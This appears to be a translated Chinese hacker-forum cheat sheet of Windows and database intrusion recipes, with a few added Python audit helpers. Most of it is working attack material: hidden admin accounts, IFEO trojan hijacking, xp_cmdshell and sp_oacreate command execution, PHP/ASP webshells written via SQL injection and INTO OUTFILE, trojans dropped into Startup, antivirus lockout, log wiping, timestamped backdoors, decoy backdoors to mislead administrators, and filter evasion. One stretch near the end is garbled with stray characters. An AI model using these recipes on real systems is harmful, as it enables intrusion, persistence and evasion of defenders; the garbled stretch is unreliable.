1. net user administrator /passwordreq:no

This means "the administrator account does not require a password". If it runs successfully, the password can be left empty at the 3389 (RDP) logon; once in, restore the setting with net user administrator /passwordreq:yes.
Caveat: /passwordreq:no only removes the rule that the account must have a password. It does not clear a password that is already set, and by default Windows refuses network logons (RDP included) for local accounts with a blank password (the "Limit local account use of blank passwords" policy), so this only helps where the account's password is already blank and that policy is off.

2. A neat way to build a clone account
Create an ordinary user first, export its entry from the registry, delete the user in Computer Management, re-import the exported entry, then add the account to the Administrators group.
3. Reading the Radmin password
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
(reg save writes a binary hive file whatever the extension; use reg export if you want a readable .reg text file.)

4. Under [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options] create a subkey named "services.exe", and under it a string value whose data is the full path of the trojan. The page leaves out the value name: IFEO hijacking uses the value named Debugger, so the trojan is launched whenever services.exe would be.

5. runas /user:guest cmd
Use this to test what a given user is allowed to do.

6. tlntadmn config sec = -ntlm
   exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'--
This simply uses the tlntadmn command to remove NTLM from the Telnet server's authentication settings (run tlntadmn /? for the details; it needs administrator rights). Creating an account with the same username and password on your own machine so that NTLM authentication goes through needs no explanation.
7. After the intrusion: patch the hole, clean up traces, place backdoors

The basic holes must be patched, e.g. su privilege escalation and sa injection. For dbo-level injection consider removing xp_dirtree (written "xp_treelist" on the page) and xp_regread, and write down the web directory yourself first, since you will not be able to read it from the registry afterwards.

Always clean your traces. For SQL Server, connect with Enterprise Manager rather than Query Analyzer: Query Analyzer leaves a record under HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers; delete it. Do not wipe the IIS logs completely with an "all in one" tool; use a logcleaner-type tool that only removes the entries for a given IP. If you can get the administrator's password through a GINA hook, log in as him to clean the logs and do the final cleanup with WYWZ. That said, cleaning by hand is safer.

Finally leave a backdoor that does not log. I usually leave several one-line backdoors, a standard backdoor and a .cfm backdoor, and set their timestamps to match the surrounding files. One harsher trick: if the machine is just an ordinary bot, drop a TXT on the administrator's desktop telling him you got in, planted a certain backdoor and added a certain user (not your real important backdoor, of course) and asking him to clean it up. That way there is a good chance your real backdoor survives.
8. declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c <command>'

For example:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators aptime /add'

(The group is administrators, not administrator as the page had it. On SQL Server 2005 and later sp_oacreate only works once "Ole Automation Procedures" is enabled: EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE; which needs sysadmin, the same as xp_cmdshell.)
9. SQL Server 2005 ships with xp_cmdshell disabled (the page says "ON", but it is off by default). To enable it you first have to turn on advanced options. This can be done straight from the injection point:

id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--

If the extended procedure itself has been dropped, re-register it afterwards with
;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
or
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
to bring xp_cmdshell back.

The same from Query Analyzer:
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
then
dbcc addextendedproc("xp_cmdshell","xplog70.dll")
10. A newer way to restore xp_cmdshell

Once the extended stored procedures have been removed there is a very simple way to bring them back.

What the removal looks like:
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'

Restore:
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")

This restores them directly; it does not matter whether sp_addextendedproc still exists, because dbcc addextendedproc is an (undocumented) DBCC command rather than a stored procedure.

-----------------------------

Drop the xp_cmdshell extended stored procedure:
exec sp_dropextendedproc 'xp_cmdshell'

Restore (the page lists the same statement again as "enable"):
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

Check whether the extended procedure exists:
select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
A result of 1 means it is there.

Restore xp_cmdshell and check in one go:
exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
A result of 1 means OK. (The page writes master.dbo.addextendedproc; the procedure is sp_addextendedproc.)

If that fails, xplog70.dll has most likely been deleted: upload it and register it by full path:
exec master.dbo.sp_addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'

Block xp_cmdshell again:
sp_dropextendedproc 'xp_cmdshell'
-------------------------
Clearing the 3389 (RDP) client's connection history takes one built-in command:
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f

Then delete the Default.rdp file in the current account's My Documents folder.
(This only clears the history on the machine you connected from; the server's Security event log still holds the logon.)
Viewing the current user's privileges in MySQL:
show grants for <user>;   (or just show grants; for the account you are connected as)

The statements below give an account the same privileges as root. Everyone has probably run into this when taking a site: the MySQL root user may only connect locally and refuses outside connections. The following solves that. It creates a user itpro with password 123, privileges equal to root, allowed to connect from any host, so you can conveniently work on the database remotely from your own machine. (If MySQL is bound to 127.0.0.1 or a firewall blocks 3306, the account alone will not get you in.)

Create USER 'itpro'@'%' IDENTIFIED BY '123';
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123' WITH GRANT OPTION
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
MAX_UPDATES_PER_HOUR 0 MAX_USER_CONNECTIONS 0;

(This is MySQL 5.x syntax. IDENTIFIED BY inside GRANT is deprecated from 5.7 and gone in 8.0, so there create the user first and GRANT without it.)

Remember to remove your footprints when you are done:
Drop USER 'itpro'@'%';
Drop DATABASE IF EXISTS `itpro`;
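The account the statements above create, root-equivalent and reachable from any host, is also exactly what an administrator should be hunting for in SHOW GRANTS output. The Python below is an added example, not code from the original post: it parses GRANT lines and flags global ALL PRIVILEGES granted to '%' or another remote host, WITH GRANT OPTION, and the FILE privilege (which INTO OUTFILE and LOAD_FILE need). The sample grant lines are constructed for this example, not captured from a real server.

```python
import re

# Constructed sample of `SHOW GRANTS FOR ...` output (MySQL 5.x style); not from a real server.
SAMPLE_GRANTS = [
    "GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY PASSWORD '*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9' WITH GRANT OPTION",
    "GRANT USAGE ON *.* TO 'app'@'localhost' IDENTIFIED BY PASSWORD '*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9'",
    "GRANT SELECT, INSERT ON `shop`.* TO 'app'@'localhost'",
    "GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION",
    "GRANT FILE ON *.* TO 'report'@'10.0.0.%'",
]

# privileges, scope (db.table), 'user'@'host', and whatever follows (IDENTIFIED BY, WITH ...)
GRANT_RE = re.compile(
    r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\s+'(?P<user>[^']*)'@'(?P<host>[^']*)'(?P<rest>.*)$",
    re.IGNORECASE,
)

LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}


def parse_grant(line):
    """Split one GRANT statement into privileges, scope, account and trailing clauses."""
    m = GRANT_RE.match(line.strip().rstrip(";"))
    if not m:
        return None
    return {
        "account": "'%s'@'%s'" % (m.group("user"), m.group("host")),
        "host": m.group("host"),
        "privs": {p.strip().upper() for p in m.group("privs").split(",")},
        "scope": m.group("scope"),
        "grant_option": "WITH GRANT OPTION" in m.group("rest").upper(),
    }


def audit_grants(lines):
    """Return {account: [reasons]} for accounts that look like the remote root-equivalent backdoor."""
    findings = {}
    for line in lines:
        g = parse_grant(line)
        if g is None:
            continue
        remote = g["host"] not in LOCAL_HOSTS
        global_all = "ALL PRIVILEGES" in g["privs"] and g["scope"] == "*.*"
        reasons = []
        if global_all and g["host"] == "%":
            reasons.append("global ALL PRIVILEGES from any host")
        elif global_all and remote:
            reasons.append("global ALL PRIVILEGES from remote host")
        if remote and g["grant_option"]:
            reasons.append("WITH GRANT OPTION")
        # ALL PRIVILEGES on *.* includes FILE, the privilege behind INTO OUTFILE / LOAD_FILE
        if remote and ("FILE" in g["privs"] or global_all):
            reasons.append("FILE privilege (INTO OUTFILE / LOAD_FILE)")
        if reasons:
            findings.setdefault(g["account"], []).extend(reasons)
    return findings


if __name__ == "__main__":
    for account, reasons in audit_grants(SAMPLE_GRANTS).items():
        print(account, "->", "; ".join(reasons))
```

Feed it the output of SHOW GRANTS for each row of mysql.user (or a dump of that table) to get the list of accounts that warrant a look. root@localhost is deliberately not flagged: the check is about reachability from outside, which is what the recipe above changes. MySQL 8 prints ALL PRIVILEGES as a long list of individual privileges, which is why FILE is also matched on its own.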
Getting SYSTEM from the current user (you need the right to create services, i.e. an administrator):
sc create SuperCMD binPath= "cmd /K start" type= own type= interact
sc start SuperCMD
The service starts an interactive cmd as LocalSystem. This only works on XP/2003 and earlier, where services may still interact with the desktop; Vista and later isolate services in session 0, so the window never reaches you.
Code:
<SCRIPT LANGUAGE="VBScript">
' Creates the local user "nosec" through the WinNT ADSI provider and adds it to Administrators.
' Save as an .hta (or an .html page opened in IE with scripting allowed) and run as an administrator.
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","nosec")
od.SetPassword "123456abc!@#"
od.SetInfo
' The page also had Set of=GetObject(os&"/nosec",user); it referenced an undefined variable and was never used, so it is dropped.
oe.Add os&"/nosec,user"
</Script>
<script language=javascript>window.close();</script>
Getting past the captcha into the admin panel to take a shell
Code:
REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
"BlockXBM"=dword:00000000

Save this as code.reg, import it into the registry and restart IE; that is all. (BlockXBM=0 re-enables rendering of XBM images, which IE blocks by default; the captcha trick depends on IE showing them.)
Writing a shell with UNION ... INTO OUTFILE
Code:
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*

Applied to the DedeCMS injection hole this writes the shell with no admin panel needed. (The %cf before the quote is the GBK wide-byte trick that swallows the escaping backslash; INTO OUTFILE needs the FILE privilege and a known, writable web path, and fails if the file already exists.)

DedeCMS admin panel with no file manager and no OUTFILE privilege: in Plugin management -> Virus scan, write a one-liner into include/config_hand.php in this form:
Code:
>';?><?php @eval($_POST[cmd]);?>

The leading >'; closes the string and statement the value is written into, so the rest is parsed as PHP.
In Oracle, after logging in with a low-privilege user, the statement below returns the password hashes of SYS and the other users, which you then crack with Cain:
Code:
select username,password from dba_users;
(Reading DBA_USERS needs the DBA role or SELECT ANY DICTIONARY; an ordinary user gets ORA-00942. From 11g on the PASSWORD column of DBA_USERS is empty and the hashes are in SYS.USER$.)
MySQL remote-access user (the same pattern as above with different names):
Code:
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
MAX_UPDATES_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0

1. Query the terminal (RDP) port

XP and 2003: REG query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber
Generic: regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
type tsp.reg
(The value comes back as a hex dword, e.g. dword:00000d3d is 3389.)
2. Enable Terminal Services on XP and 2003

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

(The page repeats the command with /d 00000000, which is the same thing.)

3. Change the terminal port to 20008 (0x4E28)

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v PortNumber /t REG_DWORD /d 0x4E28 /f
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x4E28 /f

4. Lift the XP/2003 built-in firewall's restriction on the 3389 terminal port and on which IPs may connect

REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d "3389:TCP:*:Enabled:@xpsp2res.dll,-22009" /f
(The data is port:protocol:scope:Enabled:name, and the * scope opens the port to any address. The page's copy had lost the ":@" in front of xpsp2res.dll.)
5. Enable the terminal on Windows 2000 on port 3389 (needs a reboot)

echo Windows Registry Editor Version 5.00 >2000.reg
echo. >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
echo "Enabled"="0" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
echo "ShutdownWithoutLogon"="0" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
echo "TSEnabled"=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
echo "Hotkey"="1" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
echo "PortNumber"=dword:00000D3D >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
echo "PortNumber"=dword:00000D3D >>2000.reg
regedit /s 2000.reg

(The page's copy had "ortNumber" with the P missing; the value name is PortNumber. The final regedit /s imports the file, a step the page left out.)
6. Force a reboot of Windows 2000 / 2003 (the machine restarts as soon as the last line runs)

@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
(set inf=InstallHinfSection DefaultInstall)
echo signature=$chicago$ >> restart.inf
echo [defaultinstall] >> restart.inf
rundll32 setupapi,%inf% 1 %temp%\restart.inf

(The 1 passed to InstallHinfSection is the "always reboot" mode; the empty INF is just an excuse to invoke it.)

7. Disable TCP/IP port filtering (needs a reboot)

REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
(Prefer CurrentControlSet over ControlSet001 unless you know that 001 is the active control set.)

8. When the terminal has hit its maximum number of connections, this still gets you in:

mstsc /v:ip:3389 /console

9. Adjusting NTFS permissions

cacls c: /e /t /g everyone:F    (everyone gets full control of the whole C: drive)
cacls %systemroot%\system32\*.exe /d everyone    (deny everyone access to the .exe files in system32)

------------------------------------------------------
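Item 1 reads the port by exporting the key with regedit /e, and items 3 and 5 set PortNumber under two different keys that have to agree. As an added example, not code from the original post, the Python below parses such an export and reports both PortNumber values and whether they match. The export text it works on is constructed for the example, not taken from a real machine.

```python
# Constructed sample of what `regedit /e tsp.reg "HKEY_LOCAL_MACHINE\...\Terminal Server"` might
# export on a box where only one of the two PortNumber values was changed (not from a real machine).
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
"PdName"="tcp"
"PortNumber"=dword:00004e28

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"PortNumber"=dword:00000d3d
"fEnableWinStation"=dword:00000001
"""

TDS_TCP = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
RDP_TCP = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"


def parse_reg(text):
    """Parse the subset of .reg syntax regedit /e writes: [key] headers, "name"=dword:... and
    "name"="string" lines. Other value types (hex:, hex(7):) are kept as their raw text.
    Key paths are lower-cased because the registry is case-insensitive.
    A real export read from disk should be opened with encoding="utf-16" (regedit /e writes UTF-16LE)."""
    keys = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor") or line == "REGEDIT4":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            keys[current] = {}
            continue
        if current is None or "=" not in line:
            continue
        name, _, value = line.partition("=")
        name = "(Default)" if name == "@" else name.strip('"')
        if value.lower().startswith("dword:"):
            keys[current][name] = int(value[len("dword:"):], 16)
        elif len(value) >= 2 and value[0] == '"' and value[-1] == '"':
            keys[current][name] = value[1:-1].replace('\\\\', '\\').replace('\\"', '"')
        else:
            keys[current][name] = value
    return keys


def rdp_ports(text):
    """PortNumber under both Terminal Server keys (None where the key or value is absent)."""
    keys = parse_reg(text)
    return {
        "tds_tcp": keys.get(TDS_TCP.lower(), {}).get("PortNumber"),
        "rdp_tcp": keys.get(RDP_TCP.lower(), {}).get("PortNumber"),
    }


def rdp_ports_consistent(text):
    """True only when both keys carry the same, present PortNumber."""
    p = rdp_ports(text)
    return p["tds_tcp"] is not None and p["tds_tcp"] == p["rdp_tcp"]


if __name__ == "__main__":
    print(rdp_ports(SAMPLE_REG), "consistent:", rdp_ports_consistent(SAMPLE_REG))
```

Export the whole Terminal Server key (as in item 1, but one level up) and run the check after a port change; a mismatch is the usual reason the new port does not answer after the reboot.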
3389.vbs
' Enables Terminal Services and sets the RDP port to 3389 through the WMI registry provider, then reboots.
On Error Resume Next
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set StdOut = WScript.StdOut
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
strComputer & "\root\default:StdRegProv")
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
strValueName = "fDenyTSConnections"
dwValue = 0
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
' The page had "ortNumber" here and below; the value name is PortNumber.
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
strValueName = "PortNumber"
dwValue = 3389
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strValueName = "PortNumber"
dwValue = 3389
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
Set R = CreateObject("WScript.Shell")
R.run("Shutdown.exe -f -r -t 0")
Removing the awgina.dll registry value (the GINA hook):
Code:
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f

Code:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash

Set it to 1 to stop LM hashes being stored. (It only takes effect for an account at its next password change; LM hashes already in the SAM stay until then.)
Database security: common commands for intruding an Oracle database

Recently I came across a server running an Oracle database. After cramming Oracle and asking the experts I finally got all the user passwords for the site's admin interface. I found Oracle really clumsy to work with, so to save you some detours I have collected the commands needed during an intrusion.

1. su - oracle   Not required; useful when you do not have the DBA password, since it gets you into sqlplus without one.
2. sqlplus /nolog, or sqlplus system/manager, or ./sqlplus system/manager@ora9i
3. SQL> connect / as sysdba   (or as sysoper), or
   connect internal/oracle AS SYSDBA   (scott/tiger)
   conn sys/change_on_install as sysdba;
   (system/manager, sys/change_on_install and scott/tiger are the old default passwords, worth trying first.)
4. SQL> startup;   Start the database instance.
5. Show the current database: select * from v$database;
   select name from v$database;
6. desc v$database;   Show the view's columns. (The page writes v$databases; the view is v$database.)
7. Which users have SYSDBA / SYSOPER:
   SQL> select * from V_$PWFILE_USERS;
   show user;   Show the user of the current connection.
8. Enter the test database: the page gives "database test;", which is not a SQL*Plus command; connect with connect user/password@test instead.
9. Show the database instances: select * from v$instance;   e.g. ora9i
10. Show the tables the current user can see:
   SQL> select TABLE_NAME from all_tables;
   select * from all_tables;
   SQL> select table_name from all_tables where table_name like '%u%';
   TABLE_NAME
   ------------------------------
   _default_auditing_options_
11. Show a table's structure: desc all_tables;
12. Show all columns of CQI.T_BBS_XUSER:
   desc CQI.T_BBS_XUSER;
13. Fetch the rows of CQI.T_BBS_XUSER:
   select * from CQI.T_BBS_XUSER;
14. Add a database user (test11/test):
   create user test11 identified by test default tablespace users temporary tablespace temp;
15. Grant privileges:
   grant connect,resource,dba to test11;
   grant sysdba to test11;
   commit;
16. Change a user's password (set sys and system to test):
   alter user sys identified by test;
   alter user system identified by test;
   (The page spells it "indentified"; the keyword is identified.)
Configuration files worth looking for in Java web applications:
applicationContext-util.xml
applicationContext.xml
struts-config.xml
web.xml
server.xml
tomcat-users.xml
hibernate.cfg.xml
database_pool_config.xml

\WEB-INF\classes\hibernate.cfg.xml   database connection settings
\WEB-INF\server.xml   roughly httpd.conf + my.ini + php.ini rolled into one (normally it lives in Tomcat's conf directory)
\WEB-INF\struts-config.xml   the application's action and page layout
spring.properties   contains the name of the hibernate.cfg.xml in use
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml   Tomcat manager accounts

If none of those turn up, go and read the .class files.

When injecting MSSQL by hand and you cannot write out of band, you normally read records one at a time, which is tiring. These statements read all the data in one go:

Test 1:
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1

Test 2:
create table dirs(paths varchar(100),paths1 varchar(100), id int)
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1

(FOR XML PATH('') needs SQL Server 2005 or later; the STUFF(...,1,1,'') only strips the leading comma.)

Viewing the shared folders from inside a VMware guest: in a cmd window in the guest, open
\\.host\Shared Folders
: Z+ p! ?, E6 g0 s( ]1 }cmdshell下找终端的技巧' r5 | H7 |7 {1 l! `& ]
找终端:
" d; e( @9 i0 }第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! / z+ K7 Y; R' u
而终端所对应的服务名为:TermService
* j5 v- L7 x3 S) G0 _ P# n, R& h+ ]9 a第二步:用netstat -ano命令,列出所有端口对应的PID值! ; F1 T/ P6 j4 u% @& [: _+ T7 U9 ^
找到PID值所对应的端口
+ B G( U) f6 }3 T$ V, z
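The two steps above as an added Python example, not code from the original post: it parses tasklist /svc and netstat -ano output, maps TermService to its PID(s) and returns the TCP ports those PIDs are listening on, so a moved port such as 20008 is found without guessing. The two sample outputs are constructed for the example, not captured from a real machine.

```python
import re

# Constructed sample output of `tasklist /svc` and `netstat -ano` from an XP/2003 box whose
# RDP port was moved to 20008; not captured from a real machine.
SAMPLE_TASKLIST = """
Image Name                     PID Services
========================= ======== ============================================
System Idle Process              0 N/A
System                           4 N/A
lsass.exe                      680 PolicyAgent,ProtectedStorage,SamSs
svchost.exe                    904 Dnscache,LanmanWorkstation
svchost.exe                   1044 TermService
"""

SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       880
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:20008          0.0.0.0:0              LISTENING       1044
  TCP    10.0.0.5:20008         10.0.0.9:51234         ESTABLISHED     1044
  UDP    0.0.0.0:500            *:*                                    680
"""

# image name (may contain spaces), PID, comma-separated service list
TASKLIST_RE = re.compile(r"^(?P<image>\S.*?)\s+(?P<pid>\d+)\s+(?P<svcs>\S.*)$")


def service_pids(tasklist_output, service):
    """PIDs of every process hosting the named service (one svchost hosts several services)."""
    pids = set()
    for line in tasklist_output.splitlines():
        m = TASKLIST_RE.match(line.rstrip())
        if not m:
            continue
        services = {s.strip().lower() for s in m.group("svcs").split(",")}
        if service.lower() in services:
            pids.add(int(m.group("pid")))
    return pids


def listening_ports(netstat_output, pids):
    """(address, port) pairs in LISTENING state owned by any of the given PIDs."""
    found = set()
    for line in netstat_output.splitlines():
        parts = line.split()
        if len(parts) == 5 and parts[0] == "TCP" and parts[3] == "LISTENING":
            if int(parts[4]) in pids:
                addr, _, port = parts[1].rpartition(":")  # rpartition also copes with [::]:3389
                found.add((addr, int(port)))
    return sorted(found)


def find_service_ports(tasklist_output, netstat_output, service="TermService"):
    """The two manual steps in one call: service -> PID(s) -> listening TCP ports."""
    return listening_ports(netstat_output, service_pids(tasklist_output, service))


if __name__ == "__main__":
    print(find_service_ports(SAMPLE_TASKLIST, SAMPLE_NETSTAT))
```

Pipe the real outputs into files (tasklist /svc > t.txt, netstat -ano > n.txt) and pass their contents in; the service name works for any service, not just TermService.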
" _" o% ]$ W$ I3 g; p查询sql server 2005中的密码hash
h5 w) @' l8 x# v' NSELECT password_hash FROM sys.sql_logins where name='sa' @: Q6 @" Q+ l/ ^% Y
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a, o7 \ a2 o% P, o+ O- [9 u5 x
access中导出shell! m' s7 i/ e2 c# B
Complete MySQL statements for adding a Windows user on a Chinese-language system:

use test;
create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
drop table a;

English-language system:

use test;
create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
drop table a;

The VBScript lands in the all-users Startup folder and runs with the next interactive logon. This needs the FILE privilege and a MySQL service account that may write there.

Dropping a binary the same way:
create table a (cmd BLOB);
insert into a values (CONVERT(<the trojan's hex code>,CHAR));
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\mm.exe';
drop table a;
(dumpfile writes the single row raw, without the escaping and line terminators that outfile adds, which is what keeps the .exe intact. The page's path had a single backslash before 启动; every backslash must be doubled.)
Notes on dealing with a stubborn Norton

Look up the Norton service's path:
sc qc ccSetMgr
Then set permissions so nothing can get at it. Go all the way:
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone

Then restart the server:
iisreset /reboot
That does it. Remember to restore the permissions afterwards:
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
(/G only adds an allow entry; the deny entries added with /d still win. Revoke them first with /r, e.g. cacls "..." /t /e /r everyone, and then re-grant.)
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
(The same Access export trick as above with a different driver string; the # password character is written as chr(35) so it survives the quoting.)

EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
(The procedure name is split into concatenated string fragments so a filter looking for xp_cmdshell in the request never sees it; EXEC() joins the pieces before executing.)
